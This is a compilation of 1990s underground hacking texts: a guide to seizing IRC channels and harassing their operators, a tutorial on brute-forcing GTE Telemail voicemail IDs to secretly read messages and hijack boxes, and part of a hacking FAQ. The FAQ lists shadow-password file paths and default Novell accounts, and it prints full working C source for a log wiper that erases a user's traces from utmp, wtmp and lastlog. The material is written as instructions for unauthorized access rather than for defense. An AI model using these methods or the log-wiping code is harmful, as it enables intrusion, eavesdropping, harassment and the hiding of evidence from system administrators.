Hacking IRC - The Definitive Guide

Hacking IRC - The Definitive Guide

Copyright 1996 klider@panix.com Welcome to Hacking IRC- The Definitive
Guide. The purpose of this page if you have not already guessed is to
provide what I consider optimal methodology for hacking IRC channels. In
addition, I provide some of the better channels to hack as well as fun
things to do while "owning a channel."

Contents

* Section 1-- Why Hack IRC?

* Section 2--Requisite Tools

* Section 3--What It Takes To Gain Control

* Section 4--Link Looker(LL)

* Section 5--Bots and Scripts

* Section 6--Multi-Collide-Bot(MCB)

* Section 7--Pre-Takeover Preparation

* Section 8--Thing To Do ONce You "Own" the Channel

* Section 9--Best Channels to Hack

[Image] See me if you dare.

Section 1-Why Hack IRC?

I have often asked myself this question and the answers are varied and
numerous. One of the primary reasons for hacking IRC channels is due to
shear boredom. However a multitude of secondary reasons exist. Foremost
among these is the "that asshole op i nsulted me and/or kicked me and/or
banned me from the channel and I WANT REVENGE! This is a perfectly valid
excuse and boredom is not a necessary condition for implementing a takeover
of an IRC channel. Nor is it a necessary condition that the reason yo u
were insulted and/or kicked and/or banned was because in fact you are an
asshole. All that is necessary is the will, the desire, a bit of skill, and
of course the tools, which convieniently brings me to my next section.

Section 2-Requisite Tools

Any decent craftsmen needs a good set of tools and IRC hackers are no
exception. Without the proper tools you are dead in the water. All of the
tools I describe below are available on public ftp sites. Before I launch
into a discussion of what you wil l need, it is important to point out that
if you are reading this document from your ppp/slip account you might
consider geeting a shell account if you are serious about hackin. Hacking
IRC from a slip/ppp is much more complicated than doing so from a sh ell
account. There are those who will debate this but my experience has shown
that mIRC or any of the other shareware IRC programs for the PC are no
match for the speed and ease of use that an IRC shell script allows for.
Thus the first tool required fo r hacking is an excellent irc shell script.
If you have already used IRC via a shell account and are still reading this
document you probably already have a script, which means you are well on
your way! As far as IRC shell scripts go, my personal favor ite is Lice -
again available publically via ftpFTP. Other scripts exist but the richness
and power of the LICE commands I believe is second to none. Now while it is
possible to stop here and hack ops with just a script, you would
effectively be putting yourself needlessly at a handicap. Therefore I
reccommend these additional two tools: 1)Multi-Collide-Bot(MCB) and 2)LInk
Looker(LL). These two C programs are your infantry and intellige nce
respectively. Again both are available via FTP and both are C programs and
therefore need to be compiled.

What It Takes To Gain Control

Without going into much detail clearly in order to effectively gain control
of an IRC channel you must be the only op on your channel. If you are still
clueless at this point, that is to say..You should be the only guy/gal with
the @ in front of your nic k. Once you have accomplished this, the channel
is YOURS. Of course, that is until it is taken back or you decide to cease
hacking the channel. There are a number of ways to effectively gain ops on
a channel and I will start with the simplest, then mov e to the
increasingly more complex and finesse laden methods. By far and away the
easiet method of gaining ops on a channel is to ask. You laugh eh? Well
don't. Clearly as hackers grow more prevelant on IRC the asking method
becomes more and more unlikely to succeed. This is especially true of the
bigger and well established channels that have cultures onto themselves
such as #Netsex, #Teensex, #Windows95, #Bawel, #BDSM, #Blaklife, #Texas,
#Hack, and any of the #Warez channels and a whole host of others. To gain
ops in these channels you must become a channel re gular (i.e. one that
hangs there freqently and becomes a known and trusted member of the
channel). Since you have neither the time nor the desire to make friends on
the channel you ultimately want to hack ops on, the asking method is the
last thing you want to do on all but the smaller more ethereal channels,
where you obviously stand a better although still slim chance of gaining
ops through a request.. One important exception to the ask method is
through the use of anonirc which can be used on any ch annel but has severe
limitations..more on this later. But of course you didn't come this far to
be taught how to ask for ops..so lets proceed with the next lesson. Aside
from asking there are essentially two other ways of gaining ops. The first
is through splits and the second is through anonirc. The following
discussion mostly relates to splits but I will touch on anonirc briefly at
the end. What is a split? A split occurs when the IRC server you are
communicating on detaches from the rest of the net. If you are in a channel
and by chance the only one on a particular server that splits away, you
will not only find yourself alone on the channel, but will now ha ve the
opportunity to gain ops. In order to do this you need to leave and rejoin
the channel in which case you will now find yourself with the little @ in
front of your nick. When your server rejoins you will have ops on the
channel. Now you say, "Wow, thats easy enough". Wrong. More likely than
not, especially on a bigger channel a number of things are likely to occur
that will remove your op status. Remember now the goal here is to keep ops
so you can "Have Your Way". Also and more importantly, if you go into a
channel and wait around hoping the server you are on splits, you might grow
old and die first. Therefore, what is a wannbe IRC hacker to do? Link
Looker is your answer.

Link Looker

Link Looker is a lovely little program that acts as your intelligence
officer. Without getting into the complexities or its mechanics, what it
effectively does is to give your a message anyti me a particular server
detaches from the net and a message when it rejoins. Is the methodology
becoming clearer now? Yes! Thats right! When LL tells you that a server is
split ,you connect to that server and join the channel you seek to hack ops
on and h ope nobody else split from the channel on that server(if this
occurs you will not get ops).. If you find yourself alone, you will have
ops and a fighting chance to gain control of the channel. It is important
to realize that on many channels, just getti ng ops via a split and waiting
for a rejoin is sufficient for gaining control of a channel. This is
particularly true of small to medium sized channels as well as channels
that are not organized or do not have Bots (more on this later), You simply
wait for the server to rejoin and once the channel is full you execute your
mass deop command (this is on your script and the key element in getting
rid of any other ops) and you will be the only op left. The channel is
yours and go do your thing! On bigger more organized channels, things won't
be so easy due to the presense of Bots as well as the presense of scripts
used by existing human ops.

Bots and Scripts

Bigger more organized channels inevitably have a Bot(Robot) or multiple
Bots. Bots are essentially suped up scripts that attempt to maintain ops on
a channel by their continuous presensce on channel. Additionally Bots
provide a number of channel mainten ance tasks such as opping known members
of the channel (either automatically or through password requests),
providing notes, and other information. Bots however are primarlly used for
keeping ops on channel and depending on the type of Bot, defending aga inst
IRC hackers. Bots come in many varieties and types but the best of them do
a good job of deoping spliters(thats you silly..you are opped on a split
and when you rejoin the bot will deop you). Not only will Bots deop
you..many of the human ops have scripts (such as LIce) that depending on
the settings employed will deop you as well. Now with the prevalance of
powerful scripts on IRC a recent phenomona is the occurse of the desynch.
This is a nasty event that takes place when you rejoin from a spli t and
your script deops the existing ops and the existing ops deop you at the
same time. What this does is confuse the shit out of the servers and cause
them to desynchronize from one another. This is to be avoided at all costs.
When this happens you w ill effectively become desynched from a large
portion of the net and most the channel, (depending on what server you rode
in on). What's worse is that you will think you have ops( which you will
for that server) but in reality you won't and you will be w asting your
time. So how with the prevalence of super Bots and Human ops with scripts
do you take the channel? Using MCB of course!

Multi-Collide-Bot(MCB)

Multi-Collide-Bot (MCB) is a powerful tool and your best friend. MCB is an
even lovelier program that creates a clone of a nick you want to kill
(almsot always an op on the channel you are tr ying to hack) on a server
that has split(yes the one Link Looker informed you of). Basically you feed
MCB the name or names of the nick you want to kill and tell it what split
server to establish those clones and upon rejoin.BAM/SMACK/KIILL!! Yes
thats r ight, the target is thrown out of the channel(losing ops) and must
re-establish a connection with a server to get back onto IRC and into the
channel. So yes, you have figured it out. If you kill all of the ops on a
channel and you ride in on a split you will be the only op in the channel.
Let me assure you there is nothing like seeing the nick kill messages of
the ops you have targeted as you ride in on the split.

Pre-Takeover Preparation

There are a number of things you can do before you attempt to take over an
IRC Channel to make things easier and be as well prepared as you can
possibly be. 1)Pre-Attack Observation. Plain and simple you must know who
you are attacking. One of the most important things you can do as you sit
and observe the channel is to determine which bots and/or human ops are
deopping on rejoins. These are the nicks you want to target first. You will
fail if you don't kill these nicks and rejoin because you are lik ely to
cause a desynch(discussed above). However, it is essential to make sure you
kill all of the ops. Leaving just one op alive means you have lost that
battle and must now regroup and wait for another split. It is important to
watch out for ops chan ging their nicks if they detect a split. If they do
this, the mcb you tagged with their nick will be useless to you. The way I
prevent this is to be on both sides of the split. That is to be opped in
the channel on the split server and have a clone in the channel on the
other side of the split monitoring the goings on, telling you if ops change
nicks or new people are opped (in which case you create a new mcb with
their name on it).

Things To Do Once You "Own" the Channel

Once you own the channel, the decision is clearly yours on how you want to
proceed and needless to say the number of things you can do is endless.
However, let me share with you a number of time tested ideas that are sure
to give you a thrill not to ment ion totally piss of the channel you have
now hacked. The first thing you can do is to taunt the former ops of the
channel. That is to say, they will probably be cursing you and telling you
what a loser you are for hacking the channel. They will say thi ngs like
"get a life, do something more productive". Remember don't take it
personally. You have to keep in mind that it is the formers ops who in fact
are the ones who need to get a life, considering the only power they have
or make that had (if you su ccessfully hacked the channel) was to have ops
in the first place. So you can continue to taunt and if they get relay
billegerent you can kick them off the channel. They will undoubtedly come
back within a second or two and then you can say something li ke, "Now, now
I am in control of the channel and I will not tolerate such language and
behavior. If you are unable to control yourself I will be forced to ban
you." Now this is sure to get some violent response from the former op in
which case you subse quently kick and ban them and move onto the next
person. Another thing I like to do is to word ban. This is particularly
easy if you have LICE. What you do is pick a word that if typed onto the
screen by any of the channel members, will automatically r esult in you
kicking them off the channel with the reason that word is banned. This
method is particularly good in channels like #teensex where people are
always saying the word sex, male, female, teen, age, etc. All you do is ban
those words and watch the kicks begin to fly. Another thing I like to do is
moderate the channel. What this does with the /mode +m command is to make
it such that nobody on channel can speak. This is a particularly good thing
to do when many of the channel members are getti ng out of hand and you
want to make some sort of statement without anybody interrupting you. Yes
all eyes will be trained on you. If you want to be really mean, when you
are finished hacking the channel, you can leave it moderated in which case
nobody w ill be able to speak and the channel is effectively shut down.
Other things to do which are nasty as well are to kick everybody out of the
channel and make it invite only, effectively shutting it down as well.
Think of your own creative things to do. I would love to hear about
them..email me..if they are particularly interesting I will include them in
this page with an attribution if you like.

Best Channels to Hack

#limbaugh
#rush
#lamerz
#newbies

email klider@panix.com

Read more »

Hacking GTE Telemail

...........................................
..... .....
... ======================= ...
.. ___ ..
. _ _ / / .
. // // /__ / .
. //_// // //merica .
. /___/nderground .
. .
. proudly presents .
. .
. ======================== .
. HACKING GTE TELEMAIL .
. written by .
.. MASTER MICRO ..
... ======================== ...
..... .....
...........................................


WHAT IS TELEMAIL?
=================
For many years, rich corporate mongers have invested in personal telemail
boxes for their employees. The generic term for this type of messaging system
is a "voice mailbox". It's nothing more than an answering machine with a few
extra frills. The good thing about voice mailbox hacking, is that there are
1-800 access numbers, which makes it easy for anyone who doesn't feel like
phreaking to your number, to leave you a message.

OPERATING GTE TELEMAIL
======================
To play with any voice mailbox, it is usually necessary to have a touch
tone fone. This incorporates the standard 0-9 digits and the two function keys.
The symbol that looks like a tic-tac-toe sign, "#", is called the pound key.
The other is an asterisk, and is called that, or the "star". You will need to
be farmiliar with those to use this system.
GTE Telemail, as like other voice mailoxes are VOICE. IE: You don't use
your modem for hacking this, it's all manual (pain in the butt, yes, I know).
If you like, you can try all this out while you are reading the file, just so
that you get used to the service.
The phone number for this service is: 1-800-348-6551. When you first dial
the number, and it answers, you'll hear this: "<Beep><Beep><Beep><Booo> Hello.
You've reached the telemessages service. The person you are calling is
presently unavailable. To leave a message, enter the address of the person you
are calling; or to access your regular message box, enter the pound sign".
Most of the hacking that you are going to be doing is on the "regular
message box". This is where the people get the messages that people have sent
to them. You would dial the pound key after that announcement. To make your
life easier, you never have to wait for those recordings to finish. You can
interrupt the lady only after she has begun speaking, but you can dial the
pound key right after the beeps. After pressing the pound key, you will hear
another recording: "Please enter your id number". It is here that you would
enter someone's id number. You will then hear a short "beep". Another recording
will come on if it is a valid number: "You have XX new messages, and XX saved
messages". New messages are ones that you haven't heard yet, saved messages are
the ones that you wanted to keep for later reading, or rereading.
There are different types of boxes on this service. Some have "Greeting
Messages" and "Bulletins", some have a strange method of picking up messages. I
will go over those now:
If you have messages waiting, you can receive them by dialing "2".
Sometimes, it won't give you that option, so you will have to dial "011" for
your new messages, or "012" for your saved messages. When you are listening to
your messages, you may dial a "2" to pause, and another "2" to continue. A "3"
will rewind the messages a couple of seconds back, and a "4" will fast forward
the message. Usually, if you hit the "4" key twice in a row quickly, it will
jump to the end of the message and beep, giving you a second menu.
After you have heard the message, you are given these options:
022: Reply back to the person
021: Redirect the message
7: Save the message
5: Delete the message
Dialing the asterisk at any point is like an abort command. It usually will
stop what you are doing and go to the last menu before what you are currently
doing. If you dial the asterisk at the top menu, "To get your new messages,
dial 011...etc", you will get a recording that says, "GoodBye", and then be
hung up.


HACKING GTE TELEMAIL
====================
....is a pain, but it works.

The object when hacking these things is find out as many 6 digit personal
id codes as possible. You see, to send someone a message, that involves a 7
digit code. Since the 6 digit code is easier to get, and gives you more
information, you have to scan through an entire prefix of numbers to get as
many id codes as possible.
All you really need is a touch tone fone, and a notebook. It's handy if
your fone has some kind of memory, and you can recall any number at a single
touch. Like my fone here, there are 12 extra buttons that you can program
numbers into.
First, you have find out a prefix for Texas. You know, a prefix, the first
three numbers in a seven digit fone number, not counting the area code. There's
lots of ways to do this. You can either whip out your fone book, or dial
"1-214-555-1212" or "1-817-555-1212". Most of the time, you can phreak to those
two numbers from any service. I know that Sprint lets you.
Tear out a separate piece of paper from the notebook, and draw up a chart
that looks similar to this:

0 0 1 2 3 4 5 6 7 8 9
1 0 1 2 3 4 5 6 7 8 9
2 0 1 2 3 4 5 6 7 8 9
3 0 1 2 3 4 5 6 7 8 9
4 0 1 2 3 4 5 6 7 8 9
5 0 1 2 3 4 5 6 7 8 9
6 0 1 2 3 4 5 6 7 8 9
7 0 1 2 3 4 5 6 7 8 9
8 0 1 2 3 4 5 6 7 8 9
9 0 1 2 3 4 5 6 7 8 9

The chart stands for numbers from 00-99. The first row, represents "00-09",
the second row would be "10-19" (understand?). To read it, the number on the
farthest left is the first digit in the number, then you just go from "0-9" on
the rest of the row for the second digit. It's easier than writing out "00-99"
in order.
Now, take the 3 digit prefix in Texas, and add a "0" after it. In other
words, if the prefix you picked was "123" (No, that's not a real working
prefix), then you'd have "1230". If you are using the programmable fone that I
mentioned before, put this four digit number into a key, or somewhere on the
fone that you can retrieve it easily.
Dial up the number (1-800-348-6551), and wait for the
"<beep><beep><beep><boo>", as soon as you hear the last <Boo> sound, hit the
pound key. As soon as the lady begins to speak, hit the key that has those four
numbers programmed into it, or manually dial those four numbers. After that,
dial the two digit number that you get from the chart. This should make 6
digits in all. If it's an invalid code, you will get this recording: "We're
sorry, we are unable to process the id you entered, please try again." As soon
as you hear the lady start to say "We're sorry", hit the asterisk button.
You'll hear two quick beeps. Cross out the number on the chart that didn't
work. For example: You just began the dialing, you picked "123" for a prefix,
and added the "0" on to get "1230". You were starting from the first line of
your chart, which looks like this:
0 0 1 2 3 4 5 6 7 8 9
You would dial the number and everything, press the pound sign, and hit the key
that had the "1230" on it, or if you didn't have that kind of fone, you would
dial the "1230" manually. You would then dial a "00". If that was invalid, and
the recording began saying "We're sorry....", you hit the asterisk, and then
cross out the zero (not the farthest one on the left).
If the code didn't work, you would go on to the next number. In the
example, you would be dialing "01". If the "123001" didn't work, you'd cross
out the "1" and go onto "02".
GTE Telemail only gives you three tries at getting an id code. On the third
try, you will get this kind of recording (which, by the way, you can abort, and
hit "*" where it will just hang up on you): "We are still unable to process
your id. For assistance, please call 800-527-1149. Thank You" <click>.

Now, let's say that you didn't get one of these recordings, but you heard a
short beep after you entered in the whole id. That means you got a working id
code! On your chart, don't cross out the number, but circle it. In the
notebook, write out the entire 6 digit id code.
If there are no messages on the box, just hit the asterisk until you hear
"good-bye", and go onto the next number on your chart. If there ARE messages,
you want to read them without the owner knowing. In some situations, that's
impossible, but just don't kill anybody's messages.
You want to try to keep all NEW messages NEW, so that if the original owner
of the box calls up, he will still have the same messeage. GTE operators throw
a pissy fit if the messages aren't going through, and they order all of these
conferences with their customers. Anyhow, if there is only 1 new message, after
you've listened to it, press the "*" button, and that will keep the message
new. If there are more than one, press "7" to put the message into the "saved
messages bank" after you have listened to them, except for the last message,
which you can still keep as new by hitting the asterisk.
Reading saved messages is easier because nobody has to know that you did
it. Usually after reading your new messages, the system will say, "beginning
saved messages" if there are any. Otherwise, just dial "012" from the main menu
for the saved messages. Remember to save all of these messages with the "7"
button.
Now, the object here, when listening to all of these messages is to find
out as much information as possible about the owner of that id code, and the
people that are sending the message to that box. Let's say you are listening to
a message, and you hear this: "John, this is Michael". That's great, you would
scratch down "John - Michael" in your notebook right after where you wrote down
that box's id number. This will remind you that John owns that box, and Michael
sent the message to him.
If you EVER hear them giving out the 7 digit address codes over a
telemessagenger, be sure to write that down too. Any other information is
handy, too.

Now, what on earth are you going to do with all of this information? You're
going to set up your own boxes! Or at least take over other people's boxes. The
first method is called "Read and Reply". Let's say, for example, you had one
box, and a message was sent that said, "Hello John, this is Michael.", and on
another box, you heard a message that said, "Hello Michael, this is Judy", you
might have a match. You see, since you now know Michael's box number, and
Michael sent a message to this John dude, all you have to do is go to the first
box and reply to the message that Michael sent, and it will be sent back to
Michael's box.
So, this is exactly what you must do if you think you have a match (I will
use the example above for references to make this easier):
Ex.:
Id Code: 123000 had a message to John, from Michael
Id Code: 123050 had a message to Micahael, from Bubba.

Ok, so you think that you have a match. You would go to the box that had the
message >FROM< the guy who's box you know. In other words, you would dial
"12300", and listen to the John/Michael message again. Press the "4" button to
fast forward through the message, until you hear the beep. Dial a "022" to
reply to the message. You would then dial a "1" to begin your message
recording, where you would say the last 3 digits into the phone (in this case,
you would say "000"), and press "5" to end the recording. It will then say "You
reply has been sent. You may now dial 022 to reply...etc". Just press the
asterisk until it says "good-bye", and call back. When you get on, get onto
the id number 123050, because that's the id that you think is the same that
sent that John dude a message. If there is a new message, with your voice
saying "000" into it, you got it! More on this in a second.
Don't cry if the boxes don't match up and the message doesn't go through.
There is still a chance that there are other people with the same name. Just
set them up the same way. Now, if, when you first listened to the messages on a
box, heard your voice saying three digits, but you never tried matching them up, then you just got a box! Write down the two numbers together somewhere.

If you have two matches, this is what you do... I am going to use the
examples above with the 123000 and 123050 boxes. Ok, now you have two boxes
that are "linked" through messages. Your next mission is to get both boxes to
have messages from one another that have YOUR voice on it, and to kill all
other messages. In this example, this is what you would do: Get onto the 123000
box and reply to the "from michael" message. For your message, don't say
anything, just have about 7 seconds of silence, and then finally hit "5" to
finish the message. Next, you would go to the 123050 box, and would listen to
the 7 seconds of silence message that you just sent. Reply back to this, and do
the same thing. So now, both boxes have these "7 seconds of silence" or "blank"
messages in their boxes. Next, you would go to both boxes and kill all of the
other messages in the box. Everything, even the "michael" message goes.
You have now siezed the box, and it is at your will. You must pick one box
to be your "update" box, and the other to be your "pickup" box. The "Update"
box is the one that will have your greeting message on it, like "You've dialed
Master Micro's box, to send him a message, dial 022 after the tone." The
"Pickup" line is the box that will be used for only YOU, where you read
messages that other phreaks have left you. To set these up, do the following:
Go to the box you picked as your "pickup" line. Read the blank message and reply to it. For the message, say whatever, like "This is so-and-so's box, dial
022 after the beep to reply". You then dial up the update line, read the
welcome message that you just sent, and hit "7" after listening to it to save
it. You'll hear the blank message somewhere, either as your new or your saved
message. Kill the blank message on the update line. Now, if you ever wanted to
change your greeting message, go to the pickup line, record a new message by
replying to the blank one; go to the update line, and kill the old greeting
that you don't want, and save the new one.
Once you have your box set up, all you have to do is give all your phreak
phriends the address and instructions to the update line. Tell them to save the
messages when they read it, and to reply to it using 022 if they want to send
you a message. Occassionally, check your pickup line for new messages, and kill
them after you have read them just in case the owner of the box catches on and
changes his id code.

The other method to set up boxes is used mainly for setting up codelines, or
other kinds of boxes where you don't want replies, or it is not totally
necessary to have replies. A codeline is a voice box that you have devoted to
telling your phriends new codes, and any other new info. Setting these up are
easy as hell, and you can make as many as you want, but there is a catch. You
must have figured out both the 7 digit address code, and the 6 digit id code
for the same box. Let's say there was a dude named Frank, and his address code
(the number you dial as soon as you get on, instead of dialing the pound key
and id number, to send the guy a message) was "1234567", and his id code was
"098765". First, to find out if the address and the id code are the same, you
do the same method of matching up first names. Call up the telemail service,
and instead of dialing the pound key and everything, dial the 7 digit address
code, and send a message saying something like, "yess umm.. <click>" and hit 5.
They'll think it's a screwed up message that didn't go through if the address
and the id code aren't for the same box. Anyways, after you send the message,
you'll be hung up on by GTE. Just call back, and this time enter the pound and
the 6 digit id code (in this case, 098765). If there is a message that says,
"yess umm.. ", then you go it! Then next thing you do is jump up and down and
pop yourself open a brewski.
After you've popped open your brewski, make sure you are still coherent
enough to set up a codeline, or whatever else you want to set up. I was gonna
set up those 1-212-970-XXXX phone sex recordings on a few, because you can set
up as many as you want; just to amuse the kiddies, and show them your power.
Anyhow, whip out your notebook, and pick a box that has no messages in it. If
you don't have any, then pick a box, and go to it, and kill off all of the
messages. Go to that box, and after the recording tells you that you have no
new and no saved messages, you will be given a menu. Dial the address code of
the box that you have the id and address to (in this case, 1234567). Enter a
message, that says anything you want -- if you can't think of anything, just do
the 'ole blank message. Save it and everything. You then dial the asterisk
until you get hung up, and then call back again. This time, enter the id code
of the box that you have both the addr and id to. When you hear the message
that you just sent from the other box, reply to it, and in that message, put
whatever you want into it. After you are done, just kill the message you just
heard, so there is nothing on the box that you have both info for. Now, you can
screw around with the other box that you set up, but try not to have any
messages, or anything screwy on the both you have both things for. If you do,
you're just going to wind up having it dead, so that's my warning. Tell people,
when you give out the other box number, the one you just set up, not to reply
to send you messages.

Ok, now, going back to near the beginning of the file, about talk of the
chart, let's say you went from 00 to 99, and you've filled out your chart. The
prefix you were using was: 1230. You would then change that "0" to a "1". So
your new four number prefix would be 1231. Keep doing this until you are bored,
or you have gone up to 1239. Then, you have to pick a new Texan prefix, and
start with 0 again. Now, that's a lot of numbers...

Also, that 1-800 number is not the only one in the country. There are
several others. There is probably a GTE in lots of the major states. If you
find any new numbers, look for prefixes for THAT state and not Texas. Shit, I
don't even live in Texas. I live in Russia.




"This is Master Micro for the Underground America Codeline............."
Thank You for your support.

Special Thanks to Mr. Xerox - who if I didn't blow school for that day, and he
didn't blow work, would have never found out the formats for GTE Telemail.
Also, because of his board, him and I started hacking and phreaking again, and
without Underground America, I wouldn't be typing this file right now.

DOWNLOADED FROM P-80 SYSTEMS......

Read more »

Hacking Faq

Psychotic's FAQ
by Virtual Circuit and Psychotic

I. HACKING
* What is hacking?
* How do I crack shadowed passwords?
* How can I tell the difference between an encrypted password and a shadowed password?
* Where can I find the password file if it's shadowed?
* Where is the password file located?
* What is an exploit?
* What are some basic telnet commands?
* How do I get out of the log file?
* What is a DNIC?
* What is an NUA?
* What is a VAX/VMS?
* What is telnet?
* What is an anonymous remailer?
* What is PGP?
* What is a tcp/ip?
* What is a virus?
* What is a trojan?
* What is a worm?
* What do I need to become a hacker?
* What are some common accounts for Novell Netware?
* How can I gain supervisor access to Novell Netware?
* How do I access the passwords for Novell?
* How do I crack a Novell Netware password?
* What are the domain codes?
II. PHREAKING
* What is phreaking?
* How do I start phreaking?
* What are boxes?
* What kind of boxes are there?
* How do I make a box?
* What is a loop?
III. Security
* How do I set up an anonymous FTP server?
* What are some ways that I can secure a network?
* What is a "rainbow book?"
* What is a sniffer?
* What is a firewall?
* How can I use PGP to benefit me?
IV. Group Questions
* What is Psychotic?
* Is Psychotic looking for new members?
* What is Psychosis?
* What is the "Devil's Gateway?"
* Where can I find some good resources on hacking and phreaking?
* Who are all the members in Psychotic?
* What are Psychotic's offered services?

Q. What is hacking?

A. Hacking is the art of breaking into computers to gain knowledge that our society has hidden from us. Hacking is illegal and the government spend lots of money each year to have hackers arrested.....when they should be spending the money on more important issues.

Q. What is a shadowed password?

A. A shadowed password is a cover for the real password file. It shows that the real password is hidden somewhere else.

Q. How do I crack shadowed passwords?

A. Cracking a shadowed password file is impossible. Assuming that you got the password file via anonymous ftp. You should try connecting to port 25 and doing the sendmail bug.

Q. What is the difference between an encrypted password and a shadowed password?

A. An encrypted password is just the real password scrambled and changed. It can be cracked with a password cracked and a word file. A shadowed password hides the encrypted password somewhere else other than the etc. dir.

Q. Where can I find the password file if it's shadowed?

A. Unix Path Token
-----------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow

System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *

Q. Where is the password file located?

A. The password file is located in the etc/passwd dir. You can get into the etc dir by logging on to the domain via anonymous ftp.

Q. What is an exploit?

A. An exploit is something that exploits unix or another kind of OS. You usually use exploits to gain root or high access to a system. They can prove to be very handy.

Q. What are some basic telnet commands?

A. Below is a list of common telnet commands.

Command Function

access Telnet account
c Connect to a host
cont Continue
d Disconnect
full Network echo
half Terminal echo
hangup Hangs up
mail Mail
set Select PAD parameters
stat Show network port.
telemail Mail

Q. How do I get out of the log file?

A. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.
Example:

#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}

Q. What is DNIC?

A. A DNIS says which network connect to the telnet you are using.

Q. What is NUA?

A. The NUA is the address of the computer on telnet.

Q. What is a VAX/VMS?

A. A vax/vms is Digital Equipment's major computer line. It's proprietary operating system is known as vms.

Q. What is telnet?

A. Telnet is a program which lets you log in to other computers on the net.

Q. What is an anonymous remailer?

A. An anonymous remailer is a system on the Internet that allows you to send e-mail anonymously or post messages to Usenet anonymously. You apply for an anonymous ID at the remailer site. Then, when you send a message to the remailer, it sends it out from your anonymous ID at the remailer. No one reading the post will know your real account name or host name. If someone sends a message to your anonymous ID, it will be forwarded to your real account by the remailer.

Q. What is PGP?

A. This FAQ answer is excerpted from:
PGP(tm) User's Guide Volume I: Essential Topics by Philip Zimmermann
PGP(tm) uses public-key encryption to protect E-mail and data files. Communicate securely with
people you've never met, with no secure channels needed for prior exchange of keys. PGP is well
featured and fast, with sophisticated key management, digital signatures, data compression, and
good ergonomic design.
Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a high security cryptographic software application for MS-DOS, Unix, VAX/VMS, and other computers. PGP allows people toexchange files or messages with privacy, authentication, and convenience. Privacy means that only those intended to receive a message can read it. Authentication means that messages that appear to be from a particular person can only have originated from that person. Convenience means that privacy and authentication are provided without the hassles of managing keys associated with conventional cryptographic software. No secure channels are needed to exchange keys between users, which makes PGP much easier to use. This is because PGP is based on a powerful new technology called "public key" cryptography. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA) public key cryptosystem with the speed of conventional cryptography, message digests for digital signatures, data compression before encryption, good ergonomic design, and sophisticated key management. And PGP performs the public-key functions faster than most other software implementations. PGP is public key cryptography for the masses.

Q. What is tcp/ip?

A. Tcp/ip is the system networks use to communicate with each other. It stands for Transmission Control Protocol/Internet Protocol.

Q. What is a virus?

A. A Virus is a program which reproduces itself. It may attach itself to other programs, it may create copies of itself. It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. Some Viruse scanners detect some Viruses. No Virus scanners detect all Viruses. Virus scanners will work for a while but people are always creating virii that will beat them.

Q. What is a trojan?

A. A trojan is a program which does an unauthorized function, hidden inside an authorized program. It does something other than it claims to do, usually something malicious, and it is intended by the author to do whatever it does. If it is not intentional, it is called a bug.

Q. What is a worm?

A. Worms are programsthat copy themselves over and over using up space and slowing down the system. They are self contained and use the networks to spread, in much the same way that Viruses use files to spread. Some people say the solution to Viruses and worms is to just not have any files or networks.


Q. What do I need to become a hacker?

A. You should start off with a good scanner, some dialups, a telnet client, and some knowladge of hacking. Those are the basic things that you will need. If you are serious about hacking then you should get Unix, or Linux(smaller, free version of unix).

Q. What are some common accounts for Novell Netware?

A. Below is a list of commonly used accounts for Novell Netware.
Account Purpose
---------- ------------------------------------------------------
PRINT Attaching to a second server for printing
LASER Attaching to a second server for printing
HPLASER Attaching to a second server for printing
PRINTER Attaching to a second server for printing
LASERWRITER Attaching to a second server for printing
POST Attaching to a second server for email
MAIL Attaching to a second server for email
GATEWAY Attaching a gateway machine to the server
GATE Attaching a gateway machine to the server
ROUTER Attaching an email router to the server
BACKUP May have password/station restrictions (see below), used
for backing up the server to a tape unit attached to a
workstation. For complete backups, Supervisor equivalence
is required.
WANGTEK See BACKUP
FAX Attaching a dedicated fax modem unit to the network
FAXUSER Attaching a dedicated fax modem unit to the network
